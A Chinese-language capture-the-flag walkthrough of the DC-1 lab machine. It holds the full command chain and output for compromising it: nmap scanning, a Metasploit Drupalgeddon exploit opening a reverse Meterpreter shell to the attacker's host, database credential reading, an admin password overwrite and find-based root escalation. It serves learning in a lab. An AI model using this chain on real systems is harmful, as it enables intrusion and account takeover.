DC-1渗透靶机详解

萌新DC系列靶机渗透详解之DC-1

# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.0.1 f4:6a:92:10:12:f2 SHENZHEN FAST TECHNOLOGIES CO.,LTD 192.168.0.104 58:a0:23:79:16:11 Intel Corporate 192.168.0.100 48:2c:a0:e5:36:51 Xiaomi Communications Co Ltd 192.168.0.103 8c:c8:4b:60:79:f1 CHONGQING FUGUI ELECTRONICS CO.,LTD. 192.168.0.119 8c:c8:4b:60:79:f1 CHONGQING FUGUI ELECTRONICS CO.,LTD. 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.7: 256 hosts scanned in 2.038 seconds (125.61 hosts/sec). 5 responded

因为是自己的实验环境,机器比较少 很明显就能看出 靶机是 192.168.0.119

3. 信息

使用 nmap 自带的漏洞扫描脚本(时间可能比较长)

└─# nmap --script=vuln -A 192.168.0.119 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-18 15:00 CST Nmap scan report for localhost (192.168.0.119) Host is up (0.0046s latency). Not shown: 997 closed ports PORT    STATE SERVICE VERSION 22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) 80/tcp  open  http    Apache httpd 2.2.22 ((Debian)) | http-csrf:  | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=localhost |   Found the following possible CSRF vulnerabilities:  |      |     Path: http://localhost:80/ |     Form id: user-login-form |_    Form action: /node?destination=node |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum:  |   /rss.xml: RSS or Atom feed |   /robots.txt: Robots file |   /UPGRADE.txt: Drupal file |   /INSTALL.txt: Drupal file |   /INSTALL.mysql.txt: Drupal file |   /INSTALL.pgsql.txt: Drupal file |   /: Drupal version 7  |   /README: Interesting, a readme. |   /README.txt: Interesting, a readme. |   /0/: Potentially interesting folder |_  /user/: Potentially interesting folder |_http-server-header: Apache/2.2.22 (Debian) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-vuln-cve2014-3704:  |   VULNERABLE: |   Drupal - pre Auth SQL Injection Vulnerability #找出了这个系统版本的sql漏洞 |     State: VULNERABLE (Exploitable)	 |     IDs:  CVE:CVE-2014-3704				#有漏洞的编号 和描述↓ |         The expandArguments function in the database abstraction API in |         Drupal core 7.x before 7.32 does not properly construct prepared |         statements, which allows remote attackers to conduct SQL injection |         attacks via an array containing crafted keys. |            |     Disclosure date: 2014-10-15 |     References: |       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html |       http://www.securityfocus.com/bid/70595 |       https://www.drupal.org/SA-CORE-2014-005 |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704 # ....................略.................... OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 218.35 seconds 

4. 漏洞验证

使用 metasploit 进行渗透

# 首先肯定要进入metasploit吧 msfconsole  [!] The following modules could not be loaded!../ [!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go [!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go [!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go [!] Please see /root/.msf4/logs/framework.log for details.                                                     MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM                MMMMMMMMMM MMMN$                           vMMMM MMMNl  MMMMM             MMMMM  JMMMM MMMNl  MMMMMMMN       NMMMMMMM  JMMMM MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM MMMMR  ?MMNM             MMMMM .dMMMM MMMMNm `?MMM             MMMM` dMMMMM MMMMMMN  ?MM             MM?  NMMMMMN MMMMMMMMNe                 JMMMMMNMMM MMMMMMMMMMNm,            eMMMMMNMMNMM MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM         https://metasploit.com          =[ metasploit v6.0.49-dev                          ] + -- --=[ 2142 exploits - 1141 auxiliary - 365 post       ] + -- --=[ 592 payloads - 45 encoders - 10 nops            ] + -- --=[ 8 evasion                                       ]  Metasploit tip: Tired of setting RHOSTS for modules? Try  globally setting it with setg RHOSTS x.x.x.x  #进入了msf控制台,还记得nmap扫描出来的漏洞编号嘛,搜索一下 msf6 > search CVE-2014-3704  Matching Modules ================     #  Name                                   Disclosure Date  Rank       Check  Description    -  ----                                   ---------------  ----       -----  -----------    0  exploit/multi/http/drupal_drupageddon  2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection   Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/drupal_drupageddon  #直接使用它就好了 msf6 > use 0 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp  #看看它需要的设置  msf6 exploit(multi/http/drupal_drupageddon) > show options  Module options (exploit/multi/http/drupal_drupageddon):     Name       Current Setting  Required  Description    ----       ---------------  --------  -----------    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]    RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'    RPORT      80               yes       The target port (TCP)    SSL        false            no        Negotiate SSL/TLS for outgoing connections    TARGETURI  /                yes       The target URI of the Drupal installation    VHOST                       no        HTTP server virtual host   Payload options (php/meterpreter/reverse_tcp):     Name   Current Setting  Required  Description    ----   ---------------  --------  -----------    LHOST  192.168.0.111    yes       The listen address (an interface may be specified)    LPORT  4444             yes       The listen port   Exploit target:     Id  Name    --  ----    0   Drupal 7.0 - 7.31 (form-cache PHP injection method)  #需要的设置参数有 RHOST(目标ip)         由于TARGETUR是为 / 的,不用设置也不要紧 #设置一下需要的参数  msf6 exploit(multi/http/drupal_drupageddon) > set rhost 192.168.0.119 rhost => 192.168.0.119  #开跑 msf6 exploit(multi/http/drupal_drupageddon) > run  [*] Started reverse TCP handler on 192.168.0.111:4444  [*] Sending stage (39282 bytes) to 192.168.0.119 [*] Meterpreter session 1 opened (192.168.0.111:4444 -> 192.168.0.119:42439) at 2021-07-18 15:28:08 +0800  meterpreter > #成功进入系统! 

5. 收集需要的信息

#现在我们已经是在 meterpreter 控制台里面了(也不知道咋形容,应该是控制台吧?) #常用命令和 bash 差不多,先ls看一眼里面有什么东西 meterpreter > ls Listing: /var/www =================  Mode              Size   Type  Last modified              Name ----              ----   ----  -------------              ---- 100644/rw-r--r--  174    fil   2013-11-21 04:45:59 +0800  .gitignore 100644/rw-r--r--  5767   fil   2013-11-21 04:45:59 +0800  .htaccess 100644/rw-r--r--  1481   fil   2013-11-21 04:45:59 +0800  COPYRIGHT.txt 100644/rw-r--r--  1451   fil   2013-11-21 04:45:59 +0800  INSTALL.mysql.txt 100644/rw-r--r--  1874   fil   2013-11-21 04:45:59 +0800  INSTALL.pgsql.txt 100644/rw-r--r--  1298   fil   2013-11-21 04:45:59 +0800  INSTALL.sqlite.txt 100644/rw-r--r--  17861  fil   2013-11-21 04:45:59 +0800  INSTALL.txt 100755/rwxr-xr-x  18092  fil   2013-11-01 18:14:15 +0800  LICENSE.txt 100644/rw-r--r--  8191   fil   2013-11-21 04:45:59 +0800  MAINTAINERS.txt 100644/rw-r--r--  5376   fil   2013-11-21 04:45:59 +0800  README.txt 100644/rw-r--r--  9642   fil   2013-11-21 04:45:59 +0800  UPGRADE.txt 100644/rw-r--r--  6604   fil   2013-11-21 04:45:59 +0800  authorize.php 100644/rw-r--r--  720    fil   2013-11-21 04:45:59 +0800  cron.php 100644/rw-r--r--  52     fil   2019-02-19 21:20:46 +0800  flag1.txt #这呢这呢 40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  includes 100644/rw-r--r--  529    fil   2013-11-21 04:45:59 +0800  index.php 100644/rw-r--r--  703    fil   2013-11-21 04:45:59 +0800  install.php 40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  misc 40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  modules 40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  profiles 100644/rw-r--r--  1561   fil   2013-11-21 04:45:59 +0800  robots.txt 40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  scripts #圈起来,这个也要考的 40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  sites 40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  themes 100644/rw-r--r--  19941  fil   2013-11-21 04:45:59 +0800  update.php 100644/rw-r--r--  2178   fil   2013-11-21 04:45:59 +0800  web.config 100644/rw-r--r--  417    fil   2013-11-21 04:45:59 +0800  xmlrpc.php  #一眼就看见了 flag1.txt #使用cat命令看一眼里面有什么 meterpreter > cat flag1.txt Every good CMS needs a config file - and so do you. #(每一个好的内容管理系统都需要一个配置文件 - 你也一样) #提示的很明显了,找到它的配置文件就可以了 #在上一步ls中找到了网站的文件夹 40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  sites #进去瞅一眼 看看有什么东西 meterpreter > cd sites meterpreter > ls Listing: /var/www/sites =======================  Mode              Size  Type  Last modified              Name ----              ----  ----  -------------              ---- 100644/rw-r--r--  904   fil   2013-11-21 04:45:59 +0800  README.txt 40755/rwxr-xr-x   4096  dir   2013-11-21 04:45:59 +0800  all 40555/r-xr-xr-x   4096  dir   2019-02-19 21:48:01 +0800  default 100644/rw-r--r--  2365  fil   2013-11-21 04:45:59 +0800  example.sites.php  #很明显有一个default文件夹,进去看看 meterpreter > cd default  meterpreter > ls Listing: /var/www/sites/default ===============================  Mode              Size   Type  Last modified              Name ----              ----   ----  -------------              ---- 100644/rw-r--r--  23202  fil   2013-11-21 04:45:59 +0800  default.settings.php 40775/rwxrwxr-x   4096   dir   2019-02-19 21:10:31 +0800  files 100444/r--r--r--  15989  fil   2019-02-19 21:48:01 +0800  settings.php  #找到设置文件了,cat看一下里面的东西 meterpreter > cat settings.php <?php  /**  *  * flag2												  * Brute force and dictionary attacks aren't the		#暴力和字典攻击不是最好的选择  * only ways to gain access (and you WILL need access). #只有一条获取权限的方法(您将需要访问权限)  * What can you do with these credentials?				#你能用这些证书做什么?  *  */  $databases = array (   'default' =>    array (     'default' =>      array (       'database' => 'drupaldb',       'username' => 'dbuser',       'password' => 'R0ck3t',       'host' => 'localhost',       'port' => '',       'driver' => 'mysql',       'prefix' => '',     ),   ), ); #...................略 #这flag提示啥了,咱先不管,拿到了它的用户名密码先登录再说 #进入shell meterpreter > shell Process 3506 created. Channel 9 created.  #因为有python 拿到bash权限就简单了 python -c "import pty;pty.spawn('/bin/bash')" www-data@DC-1:/var/www/sites/default$  #稍微讲一下这个 python -c "import pty;pty.spawn('/bin/bash')" #分为两块说 首先是 python -c "*" 语句,可以在控制台执行 python 代码 #例如 python -c "print('hello,world')" [注意!不可以使用连续的"符号,这样会让python不知道哪里结尾] #错例 python -c "print("hello,world")" #	Traceback (most recent call last): #	  File "<string>", line 1, in <module> #	NameError: name 'hello' is not defined # #另一块就是 import pty (伪终端程序) #引用了 pty 这个模块,而 pty.spawn('/bin/bash') 就是引用了这个bash控制端  #接下来进入它的数据库看看吧 www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t mysql -udbuser -pR0ck3t Welcome to the MySQL monitor.  Commands end with ; or g. Your MySQL connection id is 4505 Server version: 5.5.60-0+deb7u1 (Debian)  Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.  Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.  Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.  mysql>  #成功登录,看看它有什么数据库先 mysql> show databases; show databases; +--------------------+ | Database           | +--------------------+ | information_schema | | drupaldb           | +--------------------+ 2 rows in set (0.00 sec)  #drupaldb 应该就是网站的数据库了吧,进去看看 mysql> use drupaldb use drupaldb Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A  Database changed #看看有什么表  mysql> show tables; show tables; +-----------------------------+ | Tables_in_drupaldb          | +-----------------------------+ | actions                     | | authmap                     | | batch                       | | block                       | | block_custom                | | block_node_type             | | block_role                  | | blocked_ips                 | | cache                       | | cache_block                 | | cache_bootstrap             | | cache_field                 | | cache_filter                | | cache_form                  | | cache_image                 | | cache_menu                  | | cache_page                  | | cache_path                  | | cache_update                | | cache_views                 | | cache_views_data            | | comment                     | | ctools_css_cache            | | ctools_object_cache         | | date_format_locale          | | date_format_type            | | date_formats                | | field_config                | | field_config_instance       | | field_data_body             | | field_data_comment_body     | | field_data_field_image      | | field_data_field_tags       | | field_revision_body         | | field_revision_comment_body | | field_revision_field_image  | | field_revision_field_tags   | | file_managed                | | file_usage                  | | filter                      | | filter_format               | | flood                       | | history                     | | image_effects               | | image_styles                | | menu_custom                 | | menu_links                  | | menu_router                 | | node                        | | node_access                 | | node_comment_statistics     | | node_revision               | | node_type                   | | queue                       | | rdf_mapping                 | | registry                    | | registry_file               | | role                        | | role_permission             | | search_dataset              | | search_index                | | search_node_links           | | search_total                | | semaphore                   | | sequences                   | | sessions                    | | shortcut_set                | | shortcut_set_users          | | system                      | | taxonomy_index              | | taxonomy_term_data          | | taxonomy_term_hierarchy     | | taxonomy_vocabulary         | | url_alias                   | | users     #这个是用户表吧看看  | | users_roles                 | | variable                    | | views_display               | | views_view                  | | watchdog                    | +-----------------------------+ 80 rows in set (0.00 sec) #还蛮长的,找一下需要的表就行 #因为有点长,这里使用G来表示 mysql> select * from usersG; select * from usersG; *************************** 1. row ***************************              uid: 0             name:              pass:              mail:             theme:         signature:  signature_format: NULL          created: 0           access: 0            login: 0           status: 0         timezone: NULL         language:           picture: 0             init:              data: NULL *************************** 2. row ***************************              uid: 1             name: admin             pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR             mail: admin@example.com            theme:         signature:  signature_format: NULL          created: 1550581826           access: 1550583852            login: 1550582362           status: 1         timezone: Australia/Melbourne         language:           picture: 0             init: admin@example.com             data: b:0; *************************** 3. row ***************************              uid: 2             name: Fred             pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg             mail: fred@example.org            theme:         signature:  signature_format: filtered_html          created: 1550581952           access: 1550582225            login: 1550582225           status: 1         timezone: Australia/Melbourne         language:           picture: 0             init: fred@example.org             data: b:0; 3 rows in set (0.00 sec)  ERROR:  No query specified  #看这个密码的样式是来自php自带的password-hash加密 #根据上个flag可以知道不能使用暴力破解密码。那简单,换个思路更新密码就行 #根据第一步的ls能找到这个script文件夹 #直接转换密码就好了 www-data@DC-1:/var/www$ php scripts/password-hash.sh password php scripts/password-hash.sh password  password: password              hash: $S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq  #再次进入mysql回到刚才的地方 update顶掉一个账户的密码就行 mysql> update users set pass="$S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq" where uid=1; <s="$S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq" where uid=1;   Query OK, 0 rows affected (0.00 sec) Rows matched: 1  Changed: 0  Warnings: 0  #这样子就能登录网站了 #先进入网站吧 #在网站的左上角Dashboard中找到了flag3 flag3 Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow. #特殊的 PERMS 会帮助找到 passwd 不过你需要执行 -exec 去解出如何获得在阴影中的东西 #呃,翻译貌似是这样。好像是说使用PERMS和FIND找到passwd,因为两个都大写了嘛 #那么我们用 find 命令寻找flag4 www-data@DC-1:/var/www$ find / -name flag4* find / -name flag4* /home/flag4 /home/flag4/flag4.txt  #找着了,不仅找到了叫flag4的txt文本,还找到了flag4的文件夹 #进入这个文件夹打开看看吧 www-data@DC-1:/home/flag4$ cat flag4.txt cat flag4.txt Can you use this same method to find or access the flag in root?  Probably. But perhaps it's not that easy.  Or maybe it is? #你可以使用同样的方法查找或访问在root里面的flag吗? #也许可以,但是它并不是简单能获取的。或许是确实很简单? #那么最后一个flag就确定了,是提取root权限去访问这个flag #看了别的dalao的作业是使用 find提权 #简单讲就是 find 中有一个 -exec 的参数可以执行命令 #root的控制台一般是在 /bin/sh 中  www-data@DC-1:/home/flag4$ find flag4.txt -exec "/bin/sh" ; find flag4.txt -exec "/bin/sh" ; #验证提权 whoami root #成功!  cd /root ls thefinalflag.txt #找到了最后一个flag了 cat thefinalflag.txt Well done!!!!  #做的好!!! Hopefully you've enjoyed this and learned some new skills. #希望你能享受这个并且学到了新的东西 You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7 #twitter广告等巴拉巴拉  #完成 

6. 总结

这次能学到的东西做出一个总结方便回顾

  • 使用了 arp-scan -l 指令快速的找到了靶机地址

  • 使用 nmap 自带的漏洞扫描工具扫描出了漏洞

  • 使用 msf 进行漏洞攻击

  • 在 site-default 文件夹中访问了 settings.php 查找它的配置信息

  • 使用了 python 中的 pty 模块调出 bash 控制台

    python -c “import pty;pty.spawn(’/bin/bash’)”

  • 使用了 php 自带的脚本进行 hash 加密,顶掉了原有用户的密码

    php scripts/password-hash.sh password

    update [表名] set [更改名]="[更改后]" where [更改参数名称]

  • 使用 find 提权,一般 root 的 shell 就是在 /bin/sh 中

    find [已有文件] -exec “/bin/sh” ;

如果还有不懂的地方可以私信或评论区讨论,共同进步

版权声明:玥玥 发表于 2021-07-21 5:01:15。
转载请注明:DC-1渗透靶机详解 | 女黑客导航